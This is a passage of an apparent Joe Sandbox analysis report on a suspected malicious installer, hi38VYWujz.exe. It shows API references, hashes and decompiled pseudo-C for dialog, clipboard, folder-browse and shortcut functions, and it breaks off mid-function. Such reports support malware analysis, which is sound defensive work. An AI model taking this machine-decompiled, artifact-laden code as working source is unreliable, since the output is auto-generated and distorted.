Part of subcall function 00404229: SendMessageW.USER32(00000028,?,?,00404054), ref: 00404237

GetDlgItem.USER32(?,000003EC), ref: 004055C2
CreateThread.KERNEL32(00000000,00000000,Function_00005396,00000000), ref: 004055D0
CloseHandle.KERNEL32(00000000), ref: 004055D7
ShowWindow.USER32(00000000), ref: 004055FB
ShowWindow.USER32(?,00000008), ref: 00405600
ShowWindow.USER32(00000008), ref: 0040564A
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040567E
CreatePopupMenu.USER32 ref: 0040568F
AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004056A3
GetWindowRect.USER32(?,?), ref: 004056C3
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004056DC
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405714
OpenClipboard.USER32(00000000), ref: 00405724
EmptyClipboard.USER32 ref: 0040572A
GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405736
GlobalLock.KERNEL32(00000000), ref: 00405740
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405754
GlobalUnlock.KERNEL32(00000000), ref: 00405774
SetClipboardData.USER32(0000000D,00000000), ref: 0040577F
CloseClipboard.USER32 ref: 00405785

Strings

{, xrefs: 00405668

Memory Dump Source

Source File: 00000006.00000002.45132331372.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.45132294401.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132406736.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007AB000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007B3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007C6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007D8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45135016541.00000000007DA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_hi38VYWujz.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID: {
API String ID: 590372296-366298937
Opcode ID: 30a7d57daec831f4458769299bf5029d171b996c011ea2c71c6eb2cb9e30732f
Instruction ID: afdd0f92e7f9204a51c28d187295685e71ab7a2983d4d38ccc6b07981ce020cc
Opcode Fuzzy Hash: 30a7d57daec831f4458769299bf5029d171b996c011ea2c71c6eb2cb9e30732f
Instruction Fuzzy Hash: 6CB16AB1800608FFDB119FA0DD89DAE7B79FB48354F00812AFA45BA1A0CB795E51DF58

Uniqueness

Uniqueness Score: -1.00%

Function 004046C3 Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 275
stringCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E004046C3(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				long _v16;
				long _v20;
				long _v24;
				char _v28;
				intOrPtr _v32;
				long _v36;
				char _v40;
				unsigned int _v44;
				signed int _v48;
				WCHAR* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				WCHAR* _v72;
				void _v76;
				struct HWND__* _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t82;
				long _t87;
				short* _t89;
				void* _t95;
				signed int _t96;
				int _t109;
				signed short _t114;
				signed int _t118;
				struct HWND__** _t122;
				intOrPtr* _t138;
				WCHAR* _t146;
				unsigned int _t150;
				signed int _t152;
				unsigned int _t156;
				signed int _t158;
				signed int* _t159;
				signed int* _t160;
				struct HWND__* _t166;
				struct HWND__* _t167;
				int _t169;
				unsigned int _t197;

				_t156 = __edx;
				_t82 =  *0x7a0ef8;
				_v32 = _t82;
				_t146 = ( *(_t82 + 0x3c) << 0xb) + 0x7a9000;
				_v12 =  *((intOrPtr*)(_t82 + 0x38));
				if(_a8 == 0x40b) {
					E004058A5(0x3fb, _t146);
					E004064F3(_t146);
				}
				_t167 = _a4;
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E004058A5(0x3fb, _t146);
							if(E00405C38(_t186, _t146) == 0) {
								_v8 = 1;
							}
							E0040625F(0x79fef0, _t146);
							_t87 = E00406639("true");
							_v16 = _t87;
							if(_t87 == 0) {
								L30:
								E0040625F(0x79fef0, _t146);
								_t89 = E00405BDB(0x79fef0);
								_t158 = 0;
								if(_t89 != 0) {
									 *_t89 = 0;
								}
								if(GetDiskFreeSpaceW(0x79fef0,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
									goto L35;
								} else {
									_t169 = 0x400;
									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
									asm("cdq");
									_v48 = _t109;
									_v44 = _t156;
									_v12 = 1;
									goto L36;
								}
							} else {
								_t159 = 0;
								if(0 == 0x79fef0) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t114 = _v16(0x79fef0,  &_v48,  &_v28,  &_v40);
									if(_t114 != 0) {
										break;
									}
									if(_t159 != 0) {
										 *_t159 =  *_t159 & _t114;
									}
									_t160 = E00405B7C(0x79fef0);
									 *_t160 =  *_t160 & 0x00000000;
									_t159 = _t160;
									 *_t159 = 0x5c;
									if(_t159 != 0x79fef0) {
										continue;
									} else {
										goto L30;
									}
								}
								_t150 = _v44;
								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
								_v44 = _t150 >> 0xa;
								_v12 = 1;
								_t158 = 0;
								__eflags = 0;
								L35:
								_t169 = 0x400;
								L36:
								_t95 = E00404B60(5);
								if(_v12 != _t158) {
									_t197 = _v44;
									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
										_v8 = 2;
									}
								}
								if( *((intOrPtr*)( *0x7a79fc + 0x10)) != _t158) {
									E00404B48(0x3ff, 0xfffffffb, _t95);
									if(_v12 == _t158) {
										SetDlgItemTextW(_a4, _t169, 0x79fee0);
									} else {
										E00404A7F(_t169, 0xfffffffc, _v48, _v44);
									}
								}
								_t96 = _v8;
								 *0x7a8ae4 = _t96;
								if(_t96 == _t158) {
									_v8 = E0040140B(7);
								}
								if(( *(_v32 + 0x14) & _t169) != 0) {
									_v8 = _t158;
								}
								E00404216(0 | _v8 == _t158);
								if(_v8 == _t158 &&  *0x7a1f10 == _t158) {
									E0040461C();
								}
								 *0x7a1f10 = _t158;
								goto L53;
							}
						}
						_t186 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t118 = _a12 & 0x0000ffff;
					if(_t118 != 0x3fb) {
						L12:
						if(_t118 == 0x3e9) {
							_t152 = 7;
							memset( &_v76, 0, _t152 << 2);
							_v80 = _t167;
							_v72 = 0x7a1f20;
							_v60 = E00404A19;
							_v56 = _t146;
							_v68 = E00406281(_t146, 0x7a1f20, _t167, 0x7a06f8, _v12);
							_t122 =  &_v80;
							_v64 = 0x41;
							__imp__SHBrowseForFolderW(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E00405B30(_t146);
								_t125 =  *((intOrPtr*)( *0x7a8a34 + 0x11c));
								if( *((intOrPtr*)( *0x7a8a34 + 0x11c)) != 0 && _t146 == L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\Cascara\\Personers\\Narra") {
									E00406281(_t146, 0x7a1f20, _t167, 0, _t125);
									if(lstrcmpiW(0x7a69c0, 0x7a1f20) != 0) {
										lstrcatW(_t146, 0x7a69c0);
									}
								}
								 *0x7a1f10 =  *0x7a1f10 + 1;
								SetDlgItemTextW(_t167, 0x3fb, _t146);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t166 = GetDlgItem(_t167, 0x3fb);
					if(E00405BA7(_t146) != 0 && E00405BDB(_t146) == 0) {
						E00405B30(_t146);
					}
					 *0x7a79f8 = _t167;
					SetWindowTextW(_t166, _t146);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push("true");
					E004041F4(_t167);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E004041F4(_t167);
					E00404229(_t166);
					_t138 = E00406639(7);
					if(_t138 == 0) {
						L53:
						return E0040425B(_a8, _a12, _a16);
					} else {
						 *_t138(_t166, "true");
						goto L8;
					}
				}
			}

0x004046c3
0x004046c9
0x004046cf
0x004046dc
0x004046ea
0x004046ed
0x004046f5
0x004046fb
0x004046fb
0x00404707
0x0040470a
0x00404778
0x0040477f
0x00404856
0x0040485d
0x0040486c
0x0040486c
0x00404870
0x0040487a
0x00404887
0x00404889
0x00404889
0x00404897
0x0040489e
0x004048a5
0x004048a8
0x004048e4
0x004048e6
0x004048ec
0x004048f1
0x004048f5
0x004048f7
0x004048f7
0x00404913
0x00000000
0x00404915
0x00404918
0x00404926
0x0040492c
0x0040492d
0x00404930
0x00404933
0x00000000
0x00404933
0x004048aa
0x004048ac
0x004048b0
0x00000000
0x00000000
0x00000000
0x00000000
0x004048b2
0x004048b2
0x004048bf
0x004048c4
0x00000000
0x00000000
0x004048c8
0x004048ca
0x004048ca
0x004048d3
0x004048d5
0x004048da
0x004048dd
0x004048e2
0x00000000
0x00000000
0x00000000
0x00000000
0x004048e2
0x0040493f
0x00404949
0x0040494c
0x0040494f
0x00404956
0x00404956
0x00404958
0x00404958
0x0040495d
0x0040495f
0x00404967
0x0040496e
0x00404970
0x0040497b
0x0040497b
0x00404970
0x0040498b
0x00404995
0x0040499d
0x004049b8
0x0040499f
0x004049a8
0x004049a8
0x0040499d
0x004049bd
0x004049c2
0x004049c7
0x004049d0
0x004049d0
0x004049d9
0x004049db
0x004049db
0x004049e7
0x004049ef
0x004049f9
0x004049f9
0x004049fe
0x00000000
0x004049fe
0x004048a8
0x0040485f
0x00404866
0x00000000
0x00000000
0x00000000
0x00404866
0x00404785
0x0040478e
0x004047a8
0x004047ad
0x004047b7
0x004047be
0x004047ca
0x004047cd
0x004047d0
0x004047d7
0x004047df
0x004047e2
0x004047e6
0x004047ed
0x004047f5
0x0040484f
0x004047f7
0x004047f8
0x004047ff
0x00404809
0x00404811
0x0040481e
0x00404832
0x00404836
0x00404836
0x00404832
0x0040483b
0x00404848
0x00404848
0x004047f5
0x00000000
0x004047ad
0x0040479b
0x00000000
0x00000000
0x004047a1
0x00000000
0x0040470c
0x00404719
0x00404722
0x0040472f
0x0040472f
0x00404736
0x0040473c
0x00404745
0x00404748
0x0040474b
0x00404753
0x00404756
0x00404759
0x0040475f
0x00404766
0x0040476d
0x00404a04
0x00404a16
0x00404773
0x00404776
0x00000000
0x00404776
0x0040476d

APIs

GetDlgItem.USER32(?,000003FB), ref: 00404712
SetWindowTextW.USER32(00000000,?), ref: 0040473C
SHBrowseForFolderW.SHELL32(?), ref: 004047ED
CoTaskMemFree.OLE32(00000000), ref: 004047F8
lstrcmpiW.KERNEL32(Call,007A1F20,00000000,?,?), ref: 0040482A
lstrcatW.KERNEL32(?,Call), ref: 00404836
SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404848

Part of subcall function 004058A5: GetDlgItemTextW.USER32(?,?,00000400,0040487F), ref: 004058B8

Part of subcall function 004064F3: CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\hi38VYWujz.exe",0040332B,C:\Users\user\AppData\Local\Temp\,75ED3420,0040359C,?,00000006,00000008,0000000A), ref: 00406556
Part of subcall function 004064F3: CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 00406565
Part of subcall function 004064F3: CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\hi38VYWujz.exe",0040332B,C:\Users\user\AppData\Local\Temp\,75ED3420,0040359C,?,00000006,00000008,0000000A), ref: 0040656A
Part of subcall function 004064F3: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\hi38VYWujz.exe",0040332B,C:\Users\user\AppData\Local\Temp\,75ED3420,0040359C,?,00000006,00000008,0000000A), ref: 0040657D

GetDiskFreeSpaceW.KERNEL32(0079FEF0,?,?,0000040F,?,0079FEF0,0079FEF0,?,?,0079FEF0,?,?,000003FB,?), ref: 0040490B
MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404926

Part of subcall function 00404A7F: lstrlenW.KERNEL32(007A1F20,007A1F20,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B20
Part of subcall function 00404A7F: wsprintfW.USER32 ref: 00404B29
Part of subcall function 00404A7F: SetDlgItemTextW.USER32(?,007A1F20), ref: 00404B3C

Strings

C:\Users\user\AppData\Local\Temp\Cascara\Personers\Narra, xrefs: 00404813
A, xrefs: 004047E6
Call, xrefs: 00404824, 00404829, 00404834

Memory Dump Source

Source File: 00000006.00000002.45132331372.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.45132294401.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132406736.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007AB000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007B3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007C6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007D8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45135016541.00000000007DA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_hi38VYWujz.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
String ID: A$C:\Users\user\AppData\Local\Temp\Cascara\Personers\Narra$Call
API String ID: 2624150263-697454538
Opcode ID: d51832195b8407123dedbb082ffaa1d348f5dfd198bd9c85db8b114916822c7c
Instruction ID: 1a43a6be4abc44de482ff05cd7d85368efa207dbef88ee5e6ca465c7332a2ce1
Opcode Fuzzy Hash: d51832195b8407123dedbb082ffaa1d348f5dfd198bd9c85db8b114916822c7c
Instruction Fuzzy Hash: B0A1AEF1900209ABDB11AFA5CD45AAFB7B8EF84314F10843BF611B62D1DB7C99418B69

Uniqueness

Uniqueness Score: -1.00%

Function 004020FE Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129
comCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E004020FE() {
				signed int _t52;
				void* _t56;
				intOrPtr* _t60;
				intOrPtr _t61;
				intOrPtr* _t62;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr* _t68;
				intOrPtr* _t70;
				intOrPtr* _t72;
				intOrPtr* _t74;
				intOrPtr* _t76;
				intOrPtr* _t78;
				intOrPtr* _t80;
				void* _t83;
				intOrPtr* _t91;
				signed int _t101;
				signed int _t105;
				void* _t107;

				 *((intOrPtr*)(_t107 - 0x4c)) = E00402C37(0xfffffff0);
				 *((intOrPtr*)(_t107 - 0x3c)) = E00402C37(0xffffffdf);
				 *((intOrPtr*)(_t107 - 8)) = E00402C37(2);
				 *((intOrPtr*)(_t107 - 0x48)) = E00402C37(0xffffffcd);
				 *((intOrPtr*)(_t107 - 0xc)) = E00402C37(0x45);
				_t52 =  *(_t107 - 0x18);
				 *(_t107 - 0x44) = _t52 & 0x00000fff;
				_t101 = _t52 & 0x00008000;
				_t105 = _t52 >> 0x0000000c & 0x00000007;
				 *(_t107 - 0x38) = _t52 >> 0x00000010 & 0x0000ffff;
				if(E00405BA7( *((intOrPtr*)(_t107 - 0x3c))) == 0) {
					E00402C37(0x21);
				}
				_t56 = _t107 + 8;
				__imp__CoCreateInstance(0x4084dc, _t83, "true", 0x4084cc, _t56);
				if(_t56 < _t83) {
					L14:
					 *((intOrPtr*)(_t107 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t60 =  *((intOrPtr*)(_t107 + 8));
					_t61 =  *((intOrPtr*)( *_t60))(_t60, 0x4084ec, _t107 - 0x30);
					 *((intOrPtr*)(_t107 - 0x10)) = _t61;
					if(_t61 >= _t83) {
						_t64 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)(_t107 - 0x10)) =  *((intOrPtr*)( *_t64 + 0x50))(_t64,  *((intOrPtr*)(_t107 - 0x3c)));
						if(_t101 == _t83) {
							_t80 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t80 + 0x24))(_t80, L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\Cascara\\Personers\\Narra\\Freons\\Entrenching\\Samsen");
						}
						if(_t105 != _t83) {
							_t78 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t78 + 0x3c))(_t78, _t105);
						}
						_t66 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t66 + 0x34))(_t66,  *(_t107 - 0x38));
						_t91 =  *((intOrPtr*)(_t107 - 0x48));
						if( *_t91 != _t83) {
							_t76 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t76 + 0x44))(_t76, _t91,  *(_t107 - 0x44));
						}
						_t68 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t68 + 0x2c))(_t68,  *((intOrPtr*)(_t107 - 8)));
						_t70 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t70 + 0x1c))(_t70,  *((intOrPtr*)(_t107 - 0xc)));
						if( *((intOrPtr*)(_t107 - 0x10)) >= _t83) {
							_t74 =  *((intOrPtr*)(_t107 - 0x30));
							 *((intOrPtr*)(_t107 - 0x10)) =  *((intOrPtr*)( *_t74 + 0x18))(_t74,  *((intOrPtr*)(_t107 - 0x4c)), "true");
						}
						_t72 =  *((intOrPtr*)(_t107 - 0x30));
						 *((intOrPtr*)( *_t72 + 8))(_t72);
					}
					_t62 =  *((intOrPtr*)(_t107 + 8));
					 *((intOrPtr*)( *_t62 + 8))(_t62);
					if( *((intOrPtr*)(_t107 - 0x10)) >= _t83) {
						_push(0xfffffff4);
					} else {
						goto L14;
					}
				}
				E00401423();
				 *0x7a8ac8 =  *0x7a8ac8 +  *((intOrPtr*)(_t107 - 4));
				return 0;
			}

0x00402107
0x00402111
0x0040211b
0x00402125
0x00402130
0x00402133
0x0040214d
0x00402150
0x00402156
0x00402159
0x00402163
0x00402167
0x00402167
0x0040216c
0x0040217d
0x00402185
0x0040223c
0x0040223c
0x00402243
0x0040218b
0x0040218b
0x0040219a
0x0040219e
0x004021a1
0x004021a7
0x004021b5
0x004021b8
0x004021ba
0x004021c5
0x004021c5
0x004021ca
0x004021cc
0x004021d3
0x004021d3
0x004021d6
0x004021df
0x004021e2
0x004021e8
0x004021ea
0x004021f4
0x004021f4
0x004021f7
0x00402200
0x00402203
0x0040220c
0x00402212
0x00402214
0x00402222
0x00402222
0x00402225
0x0040222b
0x0040222b
0x0040222e
0x00402234
0x0040223a
0x0040224f
0x00000000
0x00000000
0x00000000
0x0040223a
0x00402245
0x00402ac2
0x00402ace

APIs

CoCreateInstance.OLE32(004084DC,?,?,004084CC,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040217D

Strings

C:\Users\user\AppData\Local\Temp\Cascara\Personers\Narra\Freons\Entrenching\Samsen, xrefs: 004021BD

Memory Dump Source

Source File: 00000006.00000002.45132331372.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.45132294401.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132406736.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007AB000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007B3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007C6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007D8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45135016541.00000000007DA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_hi38VYWujz.jbxd

Similarity

API ID: CreateInstance
String ID: C:\Users\user\AppData\Local\Temp\Cascara\Personers\Narra\Freons\Entrenching\Samsen
API String ID: 542301482-905226469
Opcode ID: 75bd8e49128f364a0fc7c4c1a7bdc2d45d81300e390856c6e58ec56fd8bb38af
Instruction ID: 12128347f435f69461b39f0114e3e01667000ffa0243525f0bda7dd6f9c1772f
Opcode Fuzzy Hash: 75bd8e49128f364a0fc7c4c1a7bdc2d45d81300e390856c6e58ec56fd8bb38af
Instruction Fuzzy Hash: BF4139B5A00208AFCB10DFE4C988AAEBBB5FF48314F20457AF515EB2D1DB799941CB44

Uniqueness

Uniqueness Score: -1.00%

Function 00402862 Relevance: 1.5, APIs: 1, Instructions: 30
fileCOMMON

Download Yara Rule

C-Code - Quality: 39%

			E00402862(short __ebx, short* __esi) {
				void* _t21;

				if(FindFirstFileW(E00402C37(2), _t21 - 0x2d4) != 0xffffffff) {
					E004061A6( *((intOrPtr*)(_t21 - 0xc)), _t8);
					_push(_t21 - 0x2a8);
					_push(__esi);
					E0040625F();
				} else {
					 *((short*)( *((intOrPtr*)(_t21 - 0xc)))) = __ebx;
					 *__esi = __ebx;
					 *((intOrPtr*)(_t21 - 4)) = 1;
				}
				 *0x7a8ac8 =  *0x7a8ac8 +  *((intOrPtr*)(_t21 - 4));
				return 0;
			}

0x0040287a
0x00402895
0x004028a0
0x004028a1
0x004029db
0x0040287c
0x0040287f
0x00402882
0x00402885
0x00402885
0x00402ac2
0x00402ace

APIs

FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402871

Memory Dump Source

Source File: 00000006.00000002.45132331372.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.45132294401.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132406736.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007AB000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007B3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007C6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007D8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45135016541.00000000007DA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_hi38VYWujz.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: 6634e00a7cf8ae9f81784cc3fd27b444408b2eeaa47297c107ee77c483e0c32a
Instruction ID: cb5017da262a82374af33b7b9c4435bd67f431664fd16e1eaa48b990974d77dd
Opcode Fuzzy Hash: 6634e00a7cf8ae9f81784cc3fd27b444408b2eeaa47297c107ee77c483e0c32a
Instruction Fuzzy Hash: 88F08C71A04104AFDB10EBA4DE49AADB378EF10314F2046BBF501F21D1DBB84E819B2A

Uniqueness

Uniqueness Score: -1.00%

Function 00404391 Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 204
windowstringCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00404391(struct HWND__* _a4, int _a8, unsigned int _a12, WCHAR* _a16) {
				intOrPtr _v8;
				int _v12;
				void* _v16;
				struct HWND__* _t56;
				signed int _t75;
				signed short* _t76;
				signed short* _t78;
				long _t92;
				int _t103;
				signed int _t108;
				signed int _t110;
				intOrPtr _t113;
				WCHAR* _t114;
				signed int* _t116;
				WCHAR* _t117;
				struct HWND__* _t118;

				if(_a8 != 0x110) {
					__eflags = _a8 - 0x111;
					if(_a8 != 0x111) {
						L13:
						__eflags = _a8 - 0x4e;
						if(_a8 != 0x4e) {
							__eflags = _a8 - 0x40b;
							if(_a8 == 0x40b) {
								 *0x79feec =  *0x79feec + 1;
								__eflags =  *0x79feec;
							}
							L27:
							_t114 = _a16;
							L28:
							return E0040425B(_a8, _a12, _t114);
						}
						_t56 = GetDlgItem(_a4, 0x3e8);
						_t114 = _a16;
						__eflags =  *((intOrPtr*)(_t114 + 8)) - 0x70b;
						if( *((intOrPtr*)(_t114 + 8)) == 0x70b) {
							__eflags =  *((intOrPtr*)(_t114 + 0xc)) - 0x201;
							if( *((intOrPtr*)(_t114 + 0xc)) == 0x201) {
								_t103 =  *((intOrPtr*)(_t114 + 0x1c));
								_t113 =  *((intOrPtr*)(_t114 + 0x18));
								_v12 = _t103;
								__eflags = _t103 - _t113 - 0x800;
								_v16 = _t113;
								_v8 = 0x7a69c0;
								if(_t103 - _t113 < 0x800) {
									SendMessageW(_t56, 0x44b, 0,  &_v16);
									SetCursor(LoadCursorW(0, 0x7f02));
									_push("true");
									E00404640(_a4, _v8);
									SetCursor(LoadCursorW(0, 0x7f00));
									_t114 = _a16;
								}
							}
						}
						__eflags =  *((intOrPtr*)(_t114 + 8)) - 0x700;
						if( *((intOrPtr*)(_t114 + 8)) != 0x700) {
							goto L28;
						} else {
							__eflags =  *((intOrPtr*)(_t114 + 0xc)) - 0x100;
							if( *((intOrPtr*)(_t114 + 0xc)) != 0x100) {
								goto L28;
							}
							__eflags =  *((intOrPtr*)(_t114 + 0x10)) - 0xd;
							if( *((intOrPtr*)(_t114 + 0x10)) == 0xd) {
								SendMessageW( *0x7a8a28, 0x111, "true", 0);
							}
							__eflags =  *((intOrPtr*)(_t114 + 0x10)) - 0x1b;
							if( *((intOrPtr*)(_t114 + 0x10)) == 0x1b) {
								SendMessageW( *0x7a8a28, 0x10, 0, 0);
							}
							return 1;
						}
					}
					__eflags = _a12 >> 0x10;
					if(_a12 >> 0x10 != 0) {
						goto L27;
					}
					__eflags =  *0x79feec; // 0x0
					if(__eflags != 0) {
						goto L27;
					}
					_t116 =  *0x7a0ef8 + 0x14;
					__eflags =  *_t116 & 0x00000020;
